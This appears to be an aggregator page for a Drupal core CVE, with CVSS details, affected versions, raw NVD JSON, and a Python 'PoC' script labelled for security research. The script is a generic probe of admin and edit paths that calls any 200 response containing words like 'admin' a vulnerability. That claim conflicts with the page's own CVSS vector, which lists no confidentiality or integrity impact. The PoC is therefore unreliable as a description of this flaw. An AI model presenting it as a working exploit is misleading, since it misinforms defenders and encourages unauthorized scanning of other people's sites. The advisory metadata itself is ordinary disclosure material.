Security Vulnerability Report
中文
CVE-2025-13080 CVSS 5.3 MEDIUM

CVE-2025-13080

Published: 2025-11-18 17:15:59
Last Modified: 2025-11-24 17:43:22

Description

Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Drupal core allows Forceful Browsing.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - VULNERABLE
Drupal Core 8.0.0 - 10.4.8
Drupal Core 10.5.0 - 10.5.5
Drupal Core 11.0.0 - 11.1.8
Drupal Core 11.2.0 - 11.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13080 Drupal Forceful Browsing PoC # Target: Drupal Core < 10.4.9, < 10.5.6, < 11.1.9, < 11.2.8 # Attack Type: Forceful Browsing (Unauthorized Access) import requests import sys def check_vulnerability(base_url): """ Check if Drupal site is vulnerable to CVE-2025-13080 Forceful Browsing via unauthorized resource access """ targets = [ "/node/1/edit", "/admin/config", "/user/1/edit", "/admin/people", "/admin/content", "/api/v1/users", "/admin/reports", "/node/add" ] vulnerable_paths = [] for path in targets: url = base_url.rstrip('/') + path try: response = requests.get(url, timeout=10, allow_redirects=False) # Check if access is allowed without authentication if response.status_code == 200: # Verify content indicates unauthorized access to protected resource if any(indicator in response.text.lower() for indicator in ['edit', 'delete', 'configure', 'admin', 'settings']): vulnerable_paths.append(path) print(f"[+] Potentially vulnerable: {url} (Status: {response.status_code})") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return vulnerable_paths if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13080.py <target_url>") print("Example: python cve-2025-13080.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2025-13080...") results = check_vulnerability(target) if results: print(f"\n[!] Found {len(results)} potentially vulnerable paths") else: print("\n[+] No obvious vulnerabilities detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13080", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:15:58.813", "lastModified": "2025-11-24T17:43:22.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Drupal core allows Forceful Browsing.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "10.4.9", "matchCriteriaId": "187161BC-CF72-4A12-9DA7-637A024DD97A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.6", "matchCriteriaId": "6637885B-CE3E-4FCE-9899-A21BA12F6C87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.1.9", "matchCriteriaId": "A80C15FD-FB6B-4E22-B836-8A18842BEED0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.8", "matchCriteriaId": "4D477FF8-4E52-43B9-8799-36DAEB8524E0"}]}]}], "references": [{"url": "https://www.drupal.org/sa-core-2025-005", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}